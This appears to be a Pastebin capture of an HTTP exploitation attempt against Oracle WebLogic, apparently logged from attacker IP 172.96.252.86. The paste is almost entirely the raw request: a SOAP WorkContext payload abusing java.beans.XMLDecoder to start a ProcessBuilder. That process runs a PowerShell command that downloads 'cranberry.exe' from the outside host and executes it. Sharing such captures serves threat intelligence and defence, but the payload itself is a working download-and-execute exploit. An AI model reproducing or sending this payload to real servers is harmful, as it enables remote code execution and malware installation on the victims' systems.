Advertisement
thlnk3r

wls_vuln_attempt_172.96.252.86

Jan 18th, 2018
340
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.97 KB | None | 0 0
  1. Host:
  2. User-Agent: python-requests/2.18.4
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Connection: keep-alive
  6. Content-Type: text/xml
  7. Content-Length: 808
  8.  
  9. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  10. <soapenv:Header>
  11. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  12. <java version="1.8.0_131" class="java.beans.XMLDecoder">
  13. <void class="java.lang.ProcessBuilder">
  14. <array class="java.lang.String" length="3">
  15. <void index="0">
  16. <string>powershell</string>
  17. </void>
  18. <void index="1">
  19. <string>-Command</string>
  20. </void>
  21. <void index="2">
  22. <string>(New-Object System.Net.WebClient).DownloadFile('http://172.96.252.86/cranberry.exe','cranberry.exe');(New-Object -com Shell.Application).ShellExecute('cranberry.exe');</string>
  23. </void>
  24. </array>
  25. <void method="start"/></void>
  26. </java>
  27. </work:WorkContext>
  28. </soapenv:Header>
  29. <soapenv:Body/>
  30. </soapenv:Envelope>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement